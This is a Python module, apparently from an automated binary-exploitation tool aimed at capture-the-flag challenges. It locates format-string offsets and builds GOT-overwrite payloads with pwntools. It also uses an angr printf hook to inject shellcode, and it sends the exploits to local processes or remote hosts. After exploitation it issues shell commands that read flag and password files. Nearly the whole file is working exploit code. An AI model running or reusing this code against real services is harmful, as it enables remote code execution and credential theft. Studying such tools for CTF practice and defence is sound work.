import angr
from pwn import *
from zeratool import printf_model
from .overflowExploiter import getRegValues, findShellcode
from .simgr_helper import getShellcode
import timeout_decorator
import time
import string


def exploitFormat(binary_name, properties):
    """Exploit a format-string vulnerability in a local binary.

    First locates which printf argument index (stack slot) holds the start of
    the controlled buffer by probing with "aaaa_%N$lx_" style inputs. Then:

    * if "win functions" are known, overwrite each GOT entry with each win
      function's address and test the result with sendExploit;
    * otherwise, if NX is disabled, hand off to rediscoverAndExploit, which
      places shellcode via the hooked printf;
    * otherwise only a message is printed (no exploit is attempted).

    :param binary_name: path of the target binary.
    :param properties: analysis dict. Reads "pwn_type" ("position", "length",
        "input"), "protections" ("arch", "got", "nx"), "win_functions" and
        "input_type".
    :return: dict with "flag_found" (bool) and, on success, the winning "input".
    """
    exploit_results = {"flag_found": False}

    input_pos = properties["pwn_type"]["position"]
    input_len = properties["pwn_type"]["length"]
    input_string = properties["pwn_type"]["input"]

    # Slice controlled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    format_specifier = b"lx"
    format_prefix = b"aaaa_%"
    if "amd64" in properties["protections"]["arch"]:
        format_specifier = b"llx"
        format_prefix = b"aaaaaaaa_%"

    stack_position = -1
    print("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_string = format_prefix + str(i).encode() + b"$" + format_specifier + b"_"
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)
        print(iter_string)
        results = runIteration(
            binary_name, iter_string, input_type=properties["input_type"]
        )
        if b"61616161" in results:  # 0x61616161 == "aaaa"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    # Every payload below depends on the stack slot; a -1 offset only yields garbage.
    if stack_position == -1:
        print("[-] Unable to locate buffer stack location")
        return exploit_results

    if properties["win_functions"]:
        for func_info in properties["win_functions"].values():
            address = func_info["fcn_addr"]
            for got_name, got_addr in properties["protections"]["got"].items():
                print("[~] Overwritting {}".format(got_name))
                writes = {got_addr: address}
                default_payload = fmtstr_payload(
                    stack_position, writes, numbwritten=input_pos
                )
                if len(default_payload) > input_len:
                    print("[~] Format input to large, shrinking")
                # NOTE(review): the original always fell through to short writes
                # (its size check ended in "or True"); that choice is preserved.
                format_payload = fmtstr_payload(
                    stack_position,
                    writes,
                    numbwritten=input_pos,
                    write_size="short",
                )

                format_input = assembleInput(
                    format_payload, start_slice, end_slice, input_len
                )

                print(repr(format_input))
                results = sendExploit(binary_name, properties, format_input)
                if results["flag_found"]:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                    return exploit_results
    elif not properties["protections"]["nx"]:
        print("[+] Binary does not have NX")
        print("[+] Overwriting GOT entry to point to shellcode")
        # NOTE(review): the dict returned here is not folded into exploit_results;
        # confirm how callers learn about success on this path.
        rediscoverAndExploit(binary_name, properties, stack_position)
    else:
        # NOTE(review): only a message is printed; no one-gadget exploit is attempted.
        print("[+] Overwriting GOT entry to point to one gadget RCE")

    return exploit_results


"""
Run until we hit our hooked printf.
Constrain input to crafted string:
    String = (Format GOT Write) + (Shellcode)
"""


def rediscoverAndExploit(binary_name, properties, stack_position):
    """Symbolically execute the binary until the printf hook builds an exploit.

    Stores the shellcode and the located stack slot in ``properties`` so the
    printFormatSploit hook can read them from ``state.globals["properties"]``.
    Builds an initial state matching ``properties["input_type"]`` and explores
    for at most 1200 seconds until a state has ``globals["type"]`` set.

    :param binary_name: path of the target binary.
    :param properties: analysis dict; mutated with "shellcode" and "stack_position".
    :param stack_position: printf argument index at which the buffer appears.
    :return: dict with "type" (None when nothing was found), plus "position",
        "length" and "input" when a marked state was found.
    """
    properties["shellcode"] = getShellcode(properties)
    properties["stack_position"] = stack_position
    inputType = properties["input_type"]

    p = angr.Project(binary_name)
    p.hook_symbol("printf", printFormatSploit())

    # Setup state based on input type
    argv = [binary_name]
    arg = None
    if inputType == "STDIN":
        # angr doesn't use the right base and stack pointers when loading the
        # binary, so our addresses are all wrong; grab them manually instead.
        entryAddr = p.loader.main_object.entry
        reg_values = getRegValues(binary_name, entryAddr)
        state = p.factory.full_init_state(args=argv)

        for register in state.arch.register_names.values():
            if register in reg_values:  # only override registers that were captured
                state.registers.store(register, reg_values[register])

    elif inputType == "LIBPWNABLE":
        handle_connection = p.loader.main_object.get_symbol("handle_connection")
        state = p.factory.entry_state(addr=handle_connection.rebased_addr)
    else:
        # Local import: the original referenced claripy without importing it.
        import claripy

        arg = claripy.BVS("arg1", 300 * 8)
        argv.append(arg)
        state = p.factory.full_init_state(args=argv)
        state.globals["arg"] = arg

    state.globals["inputType"] = inputType
    state.globals["properties"] = properties
    simgr = p.factory.simgr(state)

    run_environ = {"type": None}
    end_state = None

    @timeout_decorator.timeout(1200)
    def exploreBinary(simgr):
        simgr.explore(find=lambda s: "type" in s.globals)

    # Lame way to do a timeout
    try:
        exploreBinary(simgr)
    except (KeyboardInterrupt, timeout_decorator.TimeoutError):
        print("[~] Format check timed out")
    else:
        if "found" in simgr.stashes and len(simgr.found):
            end_state = simgr.found[0]
            run_environ["type"] = end_state.globals["type"]
            run_environ["position"] = end_state.globals["position"]
            run_environ["length"] = end_state.globals["length"]

    if end_state is None:
        return run_environ

    if inputType == "STDIN" or inputType == "LIBPWNABLE":
        stdin_str = str(end_state.posix.dumps(0))
        print("[+] Triggerable with STDIN : {}".format(stdin_str))
        run_environ["input"] = stdin_str
    elif inputType == "ARG":
        # angr's eval only concretises to int or bytes; cast_to=str is rejected.
        arg_str = str(end_state.solver.eval(arg, cast_to=bytes))
        run_environ["input"] = arg_str
        print("[+] Triggerable with arg : {}".format(arg_str))

    return run_environ


class printFormatSploit(angr.procedures.libc.printf.printf):
    """printf hook that tries to turn a symbolic format buffer into an exploit.

    On each call it inspects the first five printf arguments for a buffer
    containing symbolic (user-controlled) bytes. When one is found, it
    constrains that region to a GOT-overwrite format string followed by
    shellcode and tests the concrete input against the real binary with
    sendExploit. On success it marks ``self.state.globals`` ("type",
    "position", "length") so the explorer in rediscoverAndExploit finds it.

    Expects ``state.globals["properties"]`` to hold the analysis dict with
    "shellcode", "stack_position" and "protections" -> "got", and
    ``state.globals["inputType"]`` (plus "arg" for ARG input).
    """

    IS_FUNCTION = True

    def checkExploitable(self):
        """Try each of the first five printf arguments as an exploitable buffer.

        :return: True once an exploit was confirmed and the state marked, else False.
        """
        if "properties" not in self.state.globals:
            print("[-] Missing properties in globals!")
            exit(0)
        properties = self.state.globals["properties"]

        for i in range(5):
            state_copy = self.state.copy()

            var_loc = state_copy.solver.eval(self.arg(i))  # Assume it's a pointer
            if var_loc == 0:
                print("[-] Value at stack offset {} not a pointer".format(i))
                continue

            var_value = state_copy.memory.load(var_loc)

            # NOTE(review): reads the decimal digits of the bit length as hex
            # (32 -> 50 bytes, 64 -> 100 bytes). Kept as the scan window; confirm intent.
            scan_len = int(str(var_value.length), 16)
            symbolic_list = [
                state_copy.memory.load(var_loc + x).get_byte(0).symbolic
                for x in range(scan_len)
            ]

            # Iterate over the characters in the string, checking where our
            # symbolic values are. This helps in cases like:
            #     char myVal[100] = "I'm cool ";
            #     strcat(myVal, STDIN);
            #     printf("My super cool string is %s", myVal);
            position, greatest_count = self._longestSymbolicRun(symbolic_list)
            print(
                "[+] Found symbolic buffer at position {} of length {}".format(
                    position, greatest_count
                )
            )
            if greatest_count <= 0:
                continue

            for got_name, got_addr in properties["protections"]["got"].items():
                if self._tryGotOverwrite(
                    properties,
                    state_copy,
                    var_value,
                    var_loc,
                    position,
                    greatest_count,
                    got_name,
                    got_addr,
                ):
                    return True

        return False

    @staticmethod
    def _longestSymbolicRun(symbolic_list):
        """Return (start, count) for the longest run of True entries.

        ``count`` is the run length minus one, so a lone symbolic byte reports
        0 and is treated as "not found". This matches the "length" value
        previously published in state.globals. Ties keep the earliest run, and
        an empty list gives (0, 0).
        """
        position = 0
        greatest_count = 0
        count = 0
        for idx in range(1, len(symbolic_list)):
            if symbolic_list[idx] and symbolic_list[idx - 1]:
                count += 1
                if count > greatest_count:
                    greatest_count = count
                    position = idx - count
            else:
                count = 0
        return position, greatest_count

    def _buildAttempt(
        self,
        base_state,
        var_value,
        var_loc,
        position,
        stack_pos,
        got_addr,
        target_addr,
        shellcode_bytes,
    ):
        """Copy base_state and constrain the buffer to (GOT write -> target_addr) + shellcode.

        :return: (constrained state copy, format-write bytes, full payload bytes).
        """
        format_write = fmtstr_payload(
            stack_pos, {got_addr: target_addr}, numbwritten=position, write_size="short"
        )
        format_payload = format_write + shellcode_bytes
        attempt = base_state.copy()
        self.constrainBytes(
            attempt,
            var_value,
            var_loc,
            position,
            len(format_payload),
            strVal=format_payload,
        )
        return attempt, format_write, format_payload

    def _tryGotOverwrite(
        self,
        properties,
        base_state,
        var_value,
        var_loc,
        position,
        greatest_count,
        got_name,
        got_addr,
    ):
        """Try to point one GOT entry at shellcode stored in the format buffer.

        Works only on copies of base_state. self.state is constrained and marked
        only on success.

        :return: True if the exploit was confirmed, else False.
        """
        shellcode = properties["shellcode"]
        # The original encoded the shellcode as str; accept bytes too.
        shellcode_bytes = shellcode.encode() if isinstance(shellcode, str) else shellcode
        stack_pos = properties["stack_position"]
        binary_name = base_state.project.filename

        print("[+] Overwiting {} at {}".format(got_name, hex(got_addr)))

        # Mock write to get the approximate length of the format write ...
        mock_write = fmtstr_payload(
            stack_pos,
            {got_addr: var_loc + position},
            numbwritten=position,
            write_size="short",
        )
        # ... so the real write can target the shellcode placed right after it.
        buffer_address = var_loc + position + len(mock_write)
        attempt, format_write, format_payload = self._buildAttempt(
            base_state, var_value, var_loc, position, stack_pos, got_addr,
            buffer_address, shellcode_bytes,
        )

        stdin_bytes = attempt.posix.dumps(0)
        print("[+] Format buffer at {}".format(hex(var_loc)))
        print("[+] Shellcode located at {}".format(hex(buffer_address)))
        print("[+] Format write:\n{}".format(repr(format_write)))
        print("[+] Constructed payload:\n{}".format(repr(format_payload)))
        print(
            "[+] Constructed stdout:\n{}".format(
                repr(stdin_bytes.decode("utf-8", "ignore").rstrip("\x00"))
            )
        )

        vuln_string = attempt.solver.eval(var_value, cast_to=bytes)

        print("[~] Testing payload")
        results = sendExploit(binary_name, properties, stdin_bytes)
        if results["flag_found"]:
            print("[+] Vulnerable path found {}".format(vuln_string))
            self._markExploitable(var_value, var_loc, position, greatest_count, format_payload)
            return True

        # Maybe angr still messed up the pointer: locate the shellcode in a real
        # run that reaches the last executed basic block, then retry.
        print("[-] Payload launch failed. Fixing angr stack pointer")
        first_input = stdin_bytes.decode("utf-8", "ignore").rstrip("\x00")
        last_bb_addr = list(attempt.history.bbl_addrs)[-1]
        ret_location = findShellcode(binary_name, last_bb_addr, shellcode, first_input)

        if not ret_location:
            print("[-] Unable to find shellcode location for corrected stack")
        else:
            real_location = ret_location[0]["offset"]
            attempt, format_write, format_payload = self._buildAttempt(
                base_state, var_value, var_loc, position, stack_pos, got_addr,
                real_location, shellcode_bytes,
            )
            adjusted_input = attempt.posix.dumps(0).rstrip(b"\x00")

            print("[+] Shellcode located at {}".format(hex(real_location)))
            print("[+] Adjusted payload:\n{}".format(repr(format_payload)))
            print("[+] Constructed stdout:\n{}".format(repr(adjusted_input)))

            # Binary mode: posix.dumps returns bytes.
            with open("command.input", "wb") as f:
                f.write(adjusted_input)

            results_n = sendExploit(binary_name, properties, adjusted_input)
            if results_n["flag_found"]:
                print("[+] Vulnerable path found {}".format(repr(adjusted_input)))
                self._markExploitable(
                    var_value, var_loc, position, greatest_count, format_payload
                )
                return True

        # ARG input: accept the path when the symbolic argument carries the payload.
        if attempt.globals["inputType"] == "ARG":
            arg_bytes = attempt.solver.eval(attempt.globals["arg"], cast_to=bytes)
            if format_payload in arg_bytes:
                print("[+] Vulnerable path found {}".format(vuln_string))
                self._markExploitable(
                    var_value, var_loc, position, greatest_count, format_payload
                )
                return True

        return False

    def _markExploitable(self, var_value, var_loc, position, greatest_count, format_payload):
        """Constrain the live state to format_payload and flag it for the explorer."""
        self.constrainBytes(
            self.state,
            var_value,
            var_loc,
            position,
            len(format_payload),
            strVal=format_payload,
        )
        self.state.globals["type"] = "Format"
        self.state.globals["position"] = position
        self.state.globals["length"] = greatest_count

    def constrainBytes(self, state, symVar, loc, position, length, strVal="%x_"):
        """Constrain ``length`` bytes starting at ``loc + position`` to repeat strVal.

        A byte that cannot take the requested value is skipped with a log line,
        so the state does not become unsatisfiable.

        :param state: state whose memory is read and which receives the constraints.
        :param symVar: unused; kept for call compatibility.
        :param loc: address of the buffer.
        :param position: offset of the controlled region inside the buffer.
        :param length: number of bytes to constrain.
        :param strVal: pattern (bytes or str) repeated cyclically over the region.
        """
        for i in range(length):
            pattern_item = strVal[i % len(strVal)]
            # Indexing bytes yields int, indexing str yields a 1-char str.
            expected = ord(pattern_item) if isinstance(pattern_item, str) else pattern_item
            curr_byte = state.memory.load(loc + position + i).get_byte(0)
            constraint = curr_byte == expected
            if state.solver.satisfiable(extra_constraints=[constraint]):
                state.add_constraints(constraint)
            else:
                print(
                    "[~] Byte {} not constrained to {}".format(
                        i, repr(pattern_item)
                    )
                )

    def run(self):
        """Try the exploit first; fall back to the real printf when not exploitable."""
        if not self.checkExploitable():
            return super().run()
        return None


def getRemoteFormat(properties, remote_url, remote_port):
    """Exploit a format-string vulnerability on a remote service.

    Mirrors exploitFormat. It probes "aaaa_%N$lx_" style inputs over the network
    to find the stack slot of the controlled buffer. It then overwrites each
    GOT entry with each win function's address and tests the result with
    sendExploit.

    :param properties: analysis dict. Reads "pwn_type" ("position", "length",
        "input"), "protections" ("arch", "got") and "win_functions".
    :param remote_url: host of the remote service.
    :param remote_port: port of the remote service.
    :return: dict with "flag_found" (bool) and, on success, the winning "input".
    """
    exploit_results = {"flag_found": False}

    input_pos = properties["pwn_type"]["position"]
    input_len = properties["pwn_type"]["length"]
    input_string = properties["pwn_type"]["input"]

    # Slice controlled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    # Same probe as the local exploit: runIteration only returns leak chunks
    # containing "61616161", i.e. the hex of "aaaa".
    format_specifier = b"lx"
    format_prefix = b"aaaa_%"
    if "amd64" in properties["protections"]["arch"]:
        format_specifier = b"llx"
        format_prefix = b"aaaaaaaa_%"

    stack_position = -1
    print("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_string = format_prefix + str(i).encode() + b"$" + format_specifier + b"_"
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)

        results = runIteration(
            None,
            iter_string,
            remote_server=True,
            remote_url=remote_url,
            remote_port=remote_port,
        )
        if b"61616161" in results:  # 0x61616161 == "aaaa"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    if stack_position == -1:
        print("[-] Unable to locate buffer stack location")
        return exploit_results

    if not properties["win_functions"]:
        return exploit_results

    for func_info in properties["win_functions"].values():
        address = func_info["fcn_addr"]
        for got_name, got_addr in properties["protections"]["got"].items():
            print("[~] Overwritting {}".format(got_name))
            writes = {got_addr: address}
            format_payload = fmtstr_payload(
                stack_position, writes, numbwritten=input_pos
            )
            if len(format_payload) > input_len:
                print("[~] Format input to large, shrinking")
                format_payload = fmtstr_payload(
                    stack_position,
                    writes,
                    numbwritten=input_pos,
                    write_size="short",
                )

            format_input = assembleInput(
                format_payload, start_slice, end_slice, input_len
            )

            print(repr(format_input))
            results = sendExploit(
                None,
                properties,
                format_input,
                remote_server=True,
                remote_url=remote_url,
                port_num=remote_port,
            )
            if results["flag_found"]:
                exploit_results["flag_found"] = results["flag_found"]
                exploit_results["input"] = format_input
                return exploit_results
    return exploit_results


"""
Maintain original input size
Change this later to use angr
And add these as constraints off a path
"""


def assembleInput(str_input, start_slice, end_slice, input_len):
    """Pad a payload to ``input_len`` and splice it between the surrounding input.

    The payload is right-padded with "A" until it is ``input_len`` long. A
    payload that is already long enough is left untouched, never truncated.
    The padding character matches the payload type, so both bytes and str
    payloads work.

    :param str_input: payload (bytes or str).
    :param start_slice: input preceding the controlled region (same type).
    :param end_slice: input following the controlled region (same type).
    :param input_len: length of the controlled region.
    :return: ``start_slice + padded payload + end_slice``.
    """
    pad_char = b"A" if isinstance(str_input, (bytes, bytearray)) else "A"
    padding = pad_char * max(0, input_len - len(str_input))
    return start_slice + str_input + padding + end_slice


def runIteration(
    binary_name,
    str_input,
    remote_server=False,
    remote_url="",
    remote_port=0,
    input_type="STDIN",
):
    """Run the target once with a probe input and return the leaked stack chunk.

    For STDIN/LIBPWNABLE the probe is sent as a line, to a local process or to
    remote_url:remote_port when remote_server is True. Otherwise it is passed
    as argv[1] with trailing NUL bytes stripped.

    :return: the first "_"-separated, all-hex chunk of output containing
        b"61616161" (hex of "aaaa"), or b"" when there is none.
    """
    if input_type == "STDIN" or input_type == "LIBPWNABLE":
        if remote_server:
            proc = remote(remote_url, remote_port)
        else:
            proc = process(binary_name)
        proc.sendline(str_input)
    else:
        proc = process([binary_name, str_input.rstrip(b"\x00")])

    try:
        results = proc.recvall(timeout=5)
    finally:
        proc.close()
    print(results)
    return _findLeak(results)


def _findLeak(output, marker=b"61616161"):
    """Return the first "_"-separated all-hex chunk of ``output`` containing ``marker``, else b""."""
    hex_chars = string.hexdigits.encode()
    # Keep only chunks made entirely of hex digits (iterating bytes yields ints).
    position_leak = [
        chunk for chunk in output.split(b"_") if all(c in hex_chars for c in chunk)
    ]
    print(position_leak)
    for chunk in position_leak:
        if marker in chunk:
            return chunk
    return b""


def sendExploit(
    binary_name,
    properties,
    input_string,
    remote_server=False,
    remote_url="",
    port_num=0,
):
    """Run the target with ``input_string`` and report whether a flag appeared.

    Two attempts are made:

    1. Deliver the input and read all output. A flag is assumed when the output
       contains both "{" and "}".
    2. Otherwise start the target again with the same input and send shell
       commands (ls, cat *flag*, cat *pass*), in case the payload spawned a shell.

    :param binary_name: local binary path (not used for the connection when remote_server is True).
    :param properties: analysis dict; only "input_type" is read.
    :param input_string: payload bytes. Sent on stdin for STDIN/LIBPWNABLE,
        otherwise passed as argv[1].
    :param remote_server: connect to remote_url:port_num instead of spawning
        locally (stdin modes only).
    :return: dict with a boolean "flag_found".
    """
    send_results = {"flag_found": False}
    stdin_mode = properties["input_type"] in ("STDIN", "LIBPWNABLE")

    # Sometimes the flag is just printed. Read the output exactly once: a second
    # recvall on a drained tube returns b"" and would hide it.
    results = b""
    proc = _spawnTarget(
        binary_name, input_string, stdin_mode, remote_server, remote_url, port_num
    )
    if proc is not None:
        try:
            results = proc.recvall(timeout=15)
        finally:
            proc.close()

    print(results)
    if _looksLikeFlag(results):
        send_results["flag_found"] = True
        print("[+] Flag found:")
        print(results.replace(b"\x20", b""))
        return send_results

    # Flag not in stdout: we may have a shell
    proc = _spawnTarget(
        binary_name, input_string, stdin_mode, remote_server, remote_url, port_num
    )
    if proc is None:
        return send_results

    try:
        proc.sendline()
        proc.sendline(b"ls;\n")
        proc.sendline(b"cat *flag*;\n")
        proc.sendline(b"cat *pass*;\n")
        command_results = proc.recvall(timeout=30)  # Need a better way to "time out"
        if _looksLikeFlag(command_results):
            send_results["flag_found"] = True
            print("[+] Flag found:")
            print(command_results.replace(b"\x20", b""))
    except Exception as err:
        # Best effort: the target may have exited before accepting commands.
        print("[-] Shell interaction failed: {}".format(err))
    finally:
        proc.close()

    return send_results


def _spawnTarget(binary_name, input_string, stdin_mode, remote_server, remote_url, port_num):
    """Start the target with input_string delivered; return the tube, or None if argv spawning failed."""
    if stdin_mode:
        # Create local or remote process
        if remote_server:
            proc = remote(remote_url, port_num)
        else:
            proc = process(binary_name)
        proc.sendline(input_string)
        return proc
    try:
        return process([binary_name, input_string])
    except Exception:
        # Typically raised when the argument contains NUL bytes.
        print("[-] Issue with nulls in arg")
        return None


def _looksLikeFlag(data):
    """Return True when ``data`` contains both b"{" and b"}" (the flag heuristic)."""
    return b"{" in data and b"}" in data
